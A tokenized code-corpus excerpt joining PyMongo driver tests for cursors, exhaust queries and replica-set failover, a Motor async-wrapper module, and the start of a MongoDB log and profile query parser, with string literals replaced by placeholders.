) <EOL> self . assertGreaterEqual ( socket_count , <NUM_LIT:1> ) <EOL> old_sock_info = next ( iter ( pool . sockets ) ) <EOL> self . client . pymongo_test . test . drop ( ) <EOL> self . client . pymongo_test . test . insert_one ( { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertRaises ( <EOL> OperationFailure , <EOL> self . client . pymongo_test . test . insert_one , { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertEqual ( socket_count , len ( pool . sockets ) ) <EOL> new_sock_info = next ( iter ( pool . sockets ) ) <EOL> self . assertEqual ( old_sock_info , new_sock_info ) <EOL> def test_kill_cursors_with_cursoraddress ( self ) : <EOL> if ( client_context . is_mongos <EOL> and not client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> self . collection = self . client . pymongo_test . test <EOL> self . collection . drop ( ) <EOL> self . collection . insert_many ( [ { '<STR_LIT>' : i } for i in range ( <NUM_LIT:200> ) ] ) <EOL> cursor = self . collection . find ( ) . batch_size ( <NUM_LIT:1> ) <EOL> next ( cursor ) <EOL> self . client . kill_cursors ( <EOL> [ cursor . cursor_id ] , <EOL> _CursorAddress ( self . client . address , self . collection . full_name ) ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def raises_cursor_not_found ( ) : <EOL> try : <EOL> next ( cursor ) <EOL> return False <EOL> except CursorNotFound : <EOL> return True <EOL> wait_until ( raises_cursor_not_found , '<STR_LIT>' ) <EOL> def test_kill_cursors_with_tuple ( self ) : <EOL> if ( client_context . is_mongos <EOL> and not client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> self . collection = self . client . pymongo_test . test <EOL> self . collection . drop ( ) <EOL> self . collection . insert_many ( [ { '<STR_LIT>' : i } for i in range ( <NUM_LIT:200> ) ] ) <EOL> cursor = self . collection . find ( ) . batch_size ( <NUM_LIT:1> ) <EOL> next ( cursor ) <EOL> self . client . kill_cursors ( <EOL> [ cursor . cursor_id ] , <EOL> self . client . address ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def raises_cursor_not_found ( ) : <EOL> try : <EOL> next ( cursor ) <EOL> return False <EOL> except CursorNotFound : <EOL> return True <EOL> wait_until ( raises_cursor_not_found , '<STR_LIT>' ) <EOL> def test_kill_cursors_with_server_unavailable ( self ) : <EOL> with client_knobs ( kill_cursor_frequency = <NUM_LIT> ) : <EOL> client = MongoClient ( '<STR_LIT>' , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:0> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> client . close_cursor ( <NUM_LIT> , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> with warnings . catch_warnings ( record = True ) as user_warnings : <EOL> client . _process_kill_cursors_queue ( ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( user_warnings [ <NUM_LIT:0> ] . message ) ) <EOL> def test_lazy_connect_w0 ( self ) : <EOL> client = rs_or_single_client ( connect = False , w = <NUM_LIT:0> ) <EOL> client . test_lazy_connect_w0 . test . insert_one ( { } ) <EOL> client = rs_or_single_client ( connect = False ) <EOL> client . test_lazy_connect_w0 . test . update_one ( { } , { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:1> } } ) <EOL> client = rs_or_single_client ( connect = False ) <EOL> client . test_lazy_connect_w0 . test . delete_one ( { } ) <EOL> @ client_context . require_no_mongos <EOL> def test_exhaust_network_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> connected ( client ) <EOL> sock_info = one ( pool . sockets ) <EOL> sock_info . sock . close ( ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> with self . assertRaises ( ConnectionFailure ) : <EOL> next ( cursor ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> @ client_context . require_auth <EOL> def test_auth_network_error ( self ) : <EOL> c = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> , <EOL> waitQueueTimeoutMS = <NUM_LIT:1> ) ) <EOL> credentials = auth . _build_credentials_tuple ( <EOL> '<STR_LIT>' , '<STR_LIT>' , db_user , db_pwd , { } ) <EOL> c . _cache_credentials ( '<STR_LIT:test>' , credentials , connect = False ) <EOL> pool = get_pool ( c ) <EOL> socket_info = one ( pool . sockets ) <EOL> socket_info . sock . close ( ) <EOL> self . assertRaises ( AutoReconnect , c . test . collection . find_one ) <EOL> c . test . collection . find_one ( ) <EOL> @ client_context . require_no_replica_set <EOL> def test_connect_to_standalone_using_replica_set_name ( self ) : <EOL> client = MongoClient ( pair , replicaSet = '<STR_LIT>' , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> client . test . test . find_one ( ) <EOL> @ client_context . require_replica_set <EOL> def test_stale_getmore ( self ) : <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> client = MongoClient ( host , port , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> , <EOL> replicaSet = client_context . replica_set_name ) <EOL> client . _send_message_with_response ( <EOL> operation = message . _GetMore ( '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , <NUM_LIT> , client . codec_options ) , <EOL> address = ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> class TestExhaustCursor ( IntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestExhaustCursor , self ) . setUp ( ) <EOL> if client_context . is_mongos : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> @ client_context . require_version_min ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> def test_exhaust_query_server_error ( self ) : <EOL> client = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> sock_info = one ( pool . sockets ) <EOL> cursor = collection . find ( <EOL> SON ( [ ( '<STR_LIT>' , { } ) , ( '<STR_LIT>' , True ) ] ) , <EOL> cursor_type = CursorType . EXHAUST ) <EOL> self . assertRaises ( OperationFailure , cursor . next ) <EOL> self . assertFalse ( sock_info . closed ) <EOL> self . assertIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> def test_exhaust_getmore_server_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> collection . drop ( ) <EOL> collection . insert_many ( [ { } for _ in range ( <NUM_LIT:200> ) ] ) <EOL> self . addCleanup ( client_context . client . pymongo_test . test . drop ) <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> sock_info = one ( pool . sockets ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> cursor . next ( ) <EOL> def receive_message ( operation , request_id ) : <EOL> SocketInfo . receive_message ( sock_info , operation , request_id ) <EOL> msg = struct . pack ( '<STR_LIT>' , <NUM_LIT:1> << <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> msg += BSON . encode ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:code>' : <NUM_LIT:0> } ) <EOL> return msg <EOL> saved = sock_info . receive_message <EOL> sock_info . receive_message = receive_message <EOL> self . assertRaises ( OperationFailure , list , cursor ) <EOL> sock_info . receive_message = saved <EOL> self . assertEqual ( <NUM_LIT:200> , collection . count ( ) ) <EOL> self . assertIn ( sock_info , pool . sockets ) <EOL> def test_exhaust_query_network_error ( self ) : <EOL> client = connected ( rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) ) <EOL> collection = client . pymongo_test . test <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> sock_info = one ( pool . sockets ) <EOL> sock_info . sock . close ( ) <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> self . assertRaises ( ConnectionFailure , cursor . next ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertNotIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> def test_exhaust_getmore_network_error ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:1> ) <EOL> collection = client . pymongo_test . test <EOL> collection . drop ( ) <EOL> collection . insert_many ( [ { } for _ in range ( <NUM_LIT:200> ) ] ) <EOL> pool = get_pool ( client ) <EOL> pool . _check_interval_seconds = None <EOL> cursor = collection . find ( cursor_type = CursorType . EXHAUST ) <EOL> cursor . next ( ) <EOL> sock_info = cursor . _Cursor__exhaust_mgr . sock <EOL> sock_info . sock . close ( ) <EOL> self . assertRaises ( ConnectionFailure , list , cursor ) <EOL> self . assertTrue ( sock_info . closed ) <EOL> self . assertNotIn ( sock_info , pool . sockets ) <EOL> self . assertTrue ( pool . _socket_semaphore . acquire ( blocking = False ) ) <EOL> class TestClientLazyConnect ( IntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def _get_client ( self ) : <EOL> return rs_or_single_client ( connect = False ) <EOL> def test_insert_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> def insert_one ( collection , _ ) : <EOL> collection . insert_one ( { } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , collection . count ( ) ) <EOL> lazy_client_trial ( reset , insert_one , test , self . _get_client ) <EOL> def test_update_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_one ( { '<STR_LIT:i>' : <NUM_LIT:0> } ) <EOL> def update_one ( collection , _ ) : <EOL> collection . update_one ( { } , { '<STR_LIT>' : { '<STR_LIT:i>' : <NUM_LIT:1> } } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , collection . find_one ( ) [ '<STR_LIT:i>' ] ) <EOL> lazy_client_trial ( reset , update_one , test , self . _get_client ) <EOL> def test_delete_one ( self ) : <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_many ( [ { '<STR_LIT:i>' : i } for i in range ( NTHREADS ) ] ) <EOL> def delete_one ( collection , i ) : <EOL> collection . delete_one ( { '<STR_LIT:i>' : i } ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( <NUM_LIT:0> , collection . count ( ) ) <EOL> lazy_client_trial ( reset , delete_one , test , self . _get_client ) <EOL> def test_find_one ( self ) : <EOL> results = [ ] <EOL> def reset ( collection ) : <EOL> collection . drop ( ) <EOL> collection . insert_one ( { } ) <EOL> results [ : ] = [ ] <EOL> def find_one ( collection , _ ) : <EOL> results . append ( collection . find_one ( ) ) <EOL> def test ( collection ) : <EOL> self . assertEqual ( NTHREADS , len ( results ) ) <EOL> lazy_client_trial ( reset , find_one , test , self . _get_client ) <EOL> def test_max_bson_size ( self ) : <EOL> c = self . _get_client ( ) <EOL> ismaster = c . db . command ( '<STR_LIT>' ) <EOL> self . assertEqual ( ismaster [ '<STR_LIT>' ] , c . max_bson_size ) <EOL> if '<STR_LIT>' in ismaster : <EOL> self . assertEqual ( <EOL> ismaster [ '<STR_LIT>' ] , <EOL> c . max_message_size ) <EOL> class TestMongoClientFailover ( MockClientTest ) : <EOL> def test_discover_primary ( self ) : <EOL> with client_knobs ( heartbeat_frequency = <NUM_LIT> ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:3> , '<STR_LIT>' ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . mock_primary = '<STR_LIT>' <EOL> c . close ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( c . nodes ) ) <EOL> t = c . _get_topology ( ) <EOL> t . select_servers ( writable_server_selector ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:b>' , <NUM_LIT:2> ) ) <EOL> self . assertLess ( len ( c . nodes ) , <NUM_LIT:3> ) <EOL> t . select_server_by_address ( ( '<STR_LIT:c>' , <NUM_LIT:3> ) ) <EOL> def test_reconnect ( self ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:3> , '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> self . assertRaises ( AutoReconnect , c . db . collection . find_one ) <EOL> c . revive_host ( '<STR_LIT>' ) <EOL> c . _get_topology ( ) . select_servers ( writable_server_selector ) <EOL> self . assertEqual ( c . address , ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> def _test_network_error ( self , operation_callback ) : <EOL> with client_knobs ( heartbeat_frequency = <NUM_LIT> ) : <EOL> c = MockClient ( <EOL> standalones = [ ] , <EOL> members = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> mongoses = [ ] , <EOL> host = '<STR_LIT>' , <EOL> replicaSet = '<STR_LIT>' , <EOL> connect = False ) <EOL> c . set_wire_version_range ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> c . set_wire_version_range ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> c . _get_topology ( ) . select_servers ( writable_server_selector ) <EOL> wait_until ( lambda : len ( c . nodes ) == <NUM_LIT:2> , '<STR_LIT>' ) <EOL> c . kill_host ( '<STR_LIT>' ) <EOL> self . assertRaises ( AutoReconnect , operation_callback , c ) <EOL> server_a = c . _get_topology ( ) . get_server_by_address ( ( '<STR_LIT:a>' , <NUM_LIT:1> ) ) <EOL> sd_a = server_a . description <EOL> self . assertEqual ( SERVER_TYPE . Unknown , sd_a . server_type ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_a . min_wire_version ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_a . max_wire_version ) <EOL> server_b = c . _get_topology ( ) . get_server_by_address ( ( '<STR_LIT:b>' , <NUM_LIT:2> ) ) <EOL> sd_b = server_b . description <EOL> self . assertEqual ( SERVER_TYPE . RSSecondary , sd_b . server_type ) <EOL> self . assertEqual ( <NUM_LIT:0> , sd_b . min_wire_version ) <EOL> self . assertEqual ( <NUM_LIT:2> , sd_b . max_wire_version ) <EOL> def test_network_error_on_query ( self ) : <EOL> callback = lambda client : client . db . collection . find_one ( ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_insert ( self ) : <EOL> callback = lambda client : client . db . collection . insert_one ( { } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_update ( self ) : <EOL> callback = lambda client : client . db . collection . update_one ( <EOL> { } , { '<STR_LIT>' : '<STR_LIT:x>' } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_replace ( self ) : <EOL> callback = lambda client : client . db . collection . replace_one ( { } , { } ) <EOL> self . _test_network_error ( callback ) <EOL> def test_network_error_on_delete ( self ) : <EOL> callback = lambda client : client . db . collection . delete_many ( { } ) <EOL> self . _test_network_error ( callback ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ "<STR_LIT>" ] <EOL> from pymongo . ismaster import IsMaster <EOL> from pymongo . server import Server <EOL> from pymongo . server_description import ServerDescription <EOL> from test import unittest <EOL> class TestServer ( unittest . TestCase ) : <EOL> def test_repr ( self ) : <EOL> ismaster = IsMaster ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> sd = ServerDescription ( ( '<STR_LIT:localhost>' , <NUM_LIT> ) , ismaster ) <EOL> server = Server ( sd , pool = object ( ) , monitor = object ( ) ) <EOL> self . assertTrue ( '<STR_LIT>' in str ( server ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> """<STR_LIT>""" <EOL> import inspect <EOL> import functools <EOL> import greenlet <EOL> from pymongo . cursor import Cursor <EOL> from . import motor_py3_compat <EOL> from . motor_common import ( callback_type_error , <EOL> check_deprecated_kwargs , <EOL> mangle_delegate_name ) <EOL> _class_cache = { } <EOL> def asynchronize ( <EOL> motor_class , <EOL> framework , <EOL> sync_method , <EOL> has_write_concern , <EOL> doc = None ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( sync_method ) <EOL> def method ( self , * args , ** kwargs ) : <EOL> check_deprecated_kwargs ( kwargs ) <EOL> loop = self . get_io_loop ( ) <EOL> callback = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if callback : <EOL> if not callable ( callback ) : <EOL> raise callback_type_error <EOL> future = None <EOL> else : <EOL> future = framework . get_future ( self . get_io_loop ( ) ) <EOL> def call_method ( ) : <EOL> try : <EOL> result = sync_method ( self . delegate , * args , ** kwargs ) <EOL> if callback : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( callback , result , None ) ) <EOL> else : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( future . set_result , result ) ) <EOL> except Exception as e : <EOL> if callback : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( callback , None , e ) ) <EOL> else : <EOL> framework . call_soon ( <EOL> loop , <EOL> functools . partial ( future . set_exception , e ) ) <EOL> greenlet . greenlet ( call_method ) . switch ( ) <EOL> return future <EOL> method . is_async_method = True <EOL> method . has_write_concern = has_write_concern <EOL> name = sync_method . __name__ <EOL> method . pymongo_method_name = mangle_delegate_name ( motor_class , name ) <EOL> if doc is not None : <EOL> method . __doc__ = doc <EOL> return method <EOL> _coro_token = object ( ) <EOL> def motor_coroutine ( f ) : <EOL> """<STR_LIT>""" <EOL> f . _is_motor_coroutine = _coro_token <EOL> return f <EOL> def coroutine_annotation ( f ) : <EOL> """<STR_LIT>""" <EOL> f . coroutine_annotation = True <EOL> return f <EOL> class MotorAttributeFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , doc = None ) : <EOL> self . doc = doc <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> raise NotImplementedError <EOL> class Async ( MotorAttributeFactory ) : <EOL> def __init__ ( self , attr_name , has_write_concern , doc = None ) : <EOL> """<STR_LIT>""" <EOL> super ( Async , self ) . __init__ ( doc ) <EOL> self . attr_name = attr_name <EOL> self . has_write_concern = has_write_concern <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> name = mangle_delegate_name ( cls , self . attr_name or attr_name ) <EOL> method = getattr ( cls . __delegate_class__ , name ) <EOL> return asynchronize ( <EOL> motor_class = cls , <EOL> framework = cls . _framework , <EOL> sync_method = method , <EOL> has_write_concern = self . has_write_concern , <EOL> doc = self . doc ) <EOL> def wrap ( self , original_class ) : <EOL> return WrapAsync ( self , original_class ) <EOL> def unwrap ( self , class_name ) : <EOL> return Unwrap ( self , class_name ) <EOL> class WrapBase ( MotorAttributeFactory ) : <EOL> def __init__ ( self , prop , doc = None ) : <EOL> super ( WrapBase , self ) . __init__ ( doc ) <EOL> self . property = prop <EOL> class WrapAsync ( WrapBase ) : <EOL> def __init__ ( self , prop , original_class ) : <EOL> """<STR_LIT>""" <EOL> super ( WrapAsync , self ) . __init__ ( prop ) <EOL> self . original_class = original_class <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> async_method = self . property . create_attribute ( cls , attr_name ) <EOL> original_class = self . original_class <EOL> wrapper = cls . _framework . pymongo_class_wrapper ( async_method , <EOL> original_class ) <EOL> if self . doc : <EOL> wrapper . __doc__ = self . doc <EOL> return wrapper <EOL> class Unwrap ( WrapBase ) : <EOL> def __init__ ( self , prop , motor_class_name ) : <EOL> """<STR_LIT>""" <EOL> super ( Unwrap , self ) . __init__ ( prop ) <EOL> assert isinstance ( motor_class_name , motor_py3_compat . text_type ) <EOL> self . motor_class_name = motor_class_name <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> f = self . property . create_attribute ( cls , attr_name ) <EOL> name = self . motor_class_name <EOL> @ functools . wraps ( f ) <EOL> def _f ( self , * args , ** kwargs ) : <EOL> unwrapped_args = [ <EOL> obj . delegate if obj . __class__ . __name__ == name else obj <EOL> for obj in args ] <EOL> unwrapped_kwargs = dict ( [ <EOL> ( key , obj . delegate if obj . __class__ . __name__ == name else obj ) <EOL> for key , obj in kwargs . items ( ) ] ) <EOL> return f ( self , * unwrapped_args , ** unwrapped_kwargs ) <EOL> if self . doc : <EOL> _f . __doc__ = self . doc <EOL> return _f <EOL> class AsyncRead ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = False , doc = doc ) <EOL> class AsyncWrite ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = True , doc = doc ) <EOL> class AsyncCommand ( Async ) : <EOL> def __init__ ( self , attr_name = None , doc = None ) : <EOL> """<STR_LIT>""" <EOL> Async . __init__ ( <EOL> self , attr_name = attr_name , has_write_concern = False , doc = doc ) <EOL> class ReadOnlyPropertyDescriptor ( object ) : <EOL> def __init__ ( self , attr_name , doc = None ) : <EOL> self . attr_name = attr_name <EOL> if doc : <EOL> self . __doc__ = doc <EOL> def __get__ ( self , obj , objtype ) : <EOL> if obj : <EOL> return getattr ( obj . delegate , self . attr_name ) <EOL> else : <EOL> return getattr ( objtype . __delegate_class__ , self . attr_name ) <EOL> def __set__ ( self , obj , val ) : <EOL> raise AttributeError <EOL> class ReadOnlyProperty ( MotorAttributeFactory ) : <EOL> """<STR_LIT>""" <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> return ReadOnlyPropertyDescriptor ( attr_name , self . doc ) <EOL> class DelegateMethod ( ReadOnlyProperty ) : <EOL> """<STR_LIT>""" <EOL> class ReadWritePropertyDescriptor ( ReadOnlyPropertyDescriptor ) : <EOL> def __set__ ( self , obj , val ) : <EOL> setattr ( obj . delegate , self . attr_name , val ) <EOL> class ReadWriteProperty ( MotorAttributeFactory ) : <EOL> """<STR_LIT>""" <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> return ReadWritePropertyDescriptor ( attr_name , self . doc ) <EOL> class MotorCursorChainingMethod ( MotorAttributeFactory ) : <EOL> def create_attribute ( self , cls , attr_name ) : <EOL> cursor_method = getattr ( Cursor , attr_name ) <EOL> @ functools . wraps ( cursor_method ) <EOL> def return_clone ( self , * args , ** kwargs ) : <EOL> cursor_method ( self . delegate , * args , ** kwargs ) <EOL> return self <EOL> return_clone . is_motorcursor_chaining_method = True <EOL> return_clone . pymongo_method_name = attr_name <EOL> if self . doc : <EOL> return_clone . __doc__ = self . doc <EOL> return return_clone <EOL> def create_class_with_framework ( cls , framework , module_name ) : <EOL> motor_class_name = cls . __motor_class_name__ <EOL> cache_key = ( cls , motor_class_name , framework ) <EOL> cached_class = _class_cache . get ( cache_key ) <EOL> if cached_class : <EOL> return cached_class <EOL> new_class = type ( str ( motor_class_name ) , cls . __bases__ , cls . __dict__ . copy ( ) ) <EOL> new_class . __module__ = module_name <EOL> new_class . _framework = framework <EOL> assert hasattr ( new_class , '<STR_LIT>' ) <EOL> for base in reversed ( inspect . getmro ( cls ) ) : <EOL> for name , attr in base . __dict__ . items ( ) : <EOL> if isinstance ( attr , MotorAttributeFactory ) : <EOL> new_class_attr = attr . create_attribute ( new_class , name ) <EOL> setattr ( new_class , name , new_class_attr ) <EOL> elif getattr ( attr , '<STR_LIT>' , None ) is _coro_token : <EOL> coro = framework . coroutine ( attr ) <EOL> del coro . _is_motor_coroutine <EOL> coro . coroutine_annotation = True <EOL> setattr ( new_class , name , coro ) <EOL> _class_cache [ cache_key ] = new_class <EOL> return new_class </s>
<s> __author__ = '<STR_LIT>' <EOL> import re <EOL> from utils import pretty_json , small_json , yamlfy <EOL> from time import strptime , mktime <EOL> from datetime import datetime <EOL> import traceback <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> def scrub ( e ) : <EOL> if isinstance ( e , dict ) : <EOL> return scrub_doc ( e ) <EOL> elif isinstance ( e , list ) : <EOL> return scrub_list ( e ) <EOL> else : <EOL> return None <EOL> def scrub_doc ( d ) : <EOL> for k in d : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> d [ k ] = [ "<STR_LIT>" ] <EOL> else : <EOL> d [ k ] = scrub ( d [ k ] ) <EOL> if d [ k ] is None : <EOL> d [ k ] = "<STR_LIT>" <EOL> return d <EOL> def scrub_list ( a ) : <EOL> v = [ ] <EOL> for e in a : <EOL> e = scrub ( e ) <EOL> if e is not None : <EOL> v . append ( scrub ( e ) ) <EOL> return sorted ( v ) <EOL> ts_rx = re . compile ( '<STR_LIT>' ) <EOL> def get_line_time ( line ) : <EOL> ts = None <EOL> match = ts_rx . match ( line ) <EOL> if match : <EOL> year = datetime . utcnow ( ) . year <EOL> timestamp = mktime ( strptime ( match . group ( '<STR_LIT>' ) + '<STR_LIT:U+0020>' + str ( year ) , '<STR_LIT>' ) ) <EOL> ts = datetime . fromtimestamp ( timestamp ) <EOL> return ts <EOL> class Parser ( object ) : <EOL> def __init__ ( self , handlers ) : <EOL> self . _line_handlers = handlers <EOL> def parse ( self , input ) : <EOL> """<STR_LIT>""" <EOL> query = None <EOL> for handler in self . _line_handlers : <EOL> try : <EOL> query = handler . handle ( input ) <EOL> except Exception as e : <EOL> query = None <EOL> finally : <EOL> if query is not None : <EOL> return query <EOL> return None <EOL> class ProfileParser ( Parser ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ProfileParser , self ) . __init__ ( [ self . ProfileEntryHandler ( ) ] ) <EOL> def get_line_time ( self , input ) : <EOL> return input [ '<STR_LIT>' ] if '<STR_LIT>' in input else None <EOL> class ProfileEntryHandler : <EOL> def handle ( self , input ) : <EOL> result = OrderedDict ( ) <EOL> query = None <EOL> orderby = None <EOL> if ( input is not None ) and ( input . has_key ( '<STR_LIT>' ) ) : <EOL> if input [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> query = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> orderby = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> query = input [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = input [ '<STR_LIT>' ] <EOL> elif input [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> query = input [ '<STR_LIT>' ] <EOL> if input . has_key ( '<STR_LIT>' ) : <EOL> if input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) : <EOL> orderby = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = input [ '<STR_LIT>' ] <EOL> elif ( ( input [ '<STR_LIT>' ] == '<STR_LIT>' ) and <EOL> ( ( input [ '<STR_LIT>' ] . has_key ( '<STR_LIT:count>' ) ) or <EOL> ( input [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) ) ) : <EOL> query = input [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> db = input [ '<STR_LIT>' ] [ <NUM_LIT:0> : input [ '<STR_LIT>' ] . rfind ( '<STR_LIT:.>' ) ] <EOL> result [ '<STR_LIT>' ] = db + "<STR_LIT:.>" + input [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] <EOL> else : <EOL> return None <EOL> toMask = OrderedDict ( ) <EOL> if orderby is not None : <EOL> result [ '<STR_LIT>' ] = orderby <EOL> toMask [ '<STR_LIT>' ] = orderby <EOL> result [ '<STR_LIT>' ] = scrub ( query ) <EOL> toMask [ '<STR_LIT>' ] = query <EOL> result [ '<STR_LIT>' ] = small_json ( toMask ) <EOL> result [ '<STR_LIT>' ] = { '<STR_LIT>' : input [ '<STR_LIT>' ] } <EOL> return result <EOL> else : <EOL> return None <EOL> class LogParser ( Parser ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( LogParser , self ) . __init__ ( [ CmdQueryHandler ( ) , <EOL> UpdateQueryHandler ( ) , <EOL> StandardQueryHandler ( ) , <EOL> TimeLineHandler ( ) ] ) <EOL> class QueryLineHandler : <EOL> def parse_query ( self , extracted_query ) : <EOL> return yamlfy ( extracted_query ) <EOL> def handle ( self , line ) : <EOL> result = self . do_handle ( line ) <EOL> if result is not None : <EOL> result [ '<STR_LIT>' ] = get_line_time ( line ) <EOL> return result <EOL> def do_handle ( self , line ) : <EOL> return None <EOL> def parse_line_stats ( self , stat_string ) : <EOL> line_stats = { } <EOL> split = stat_string . split ( 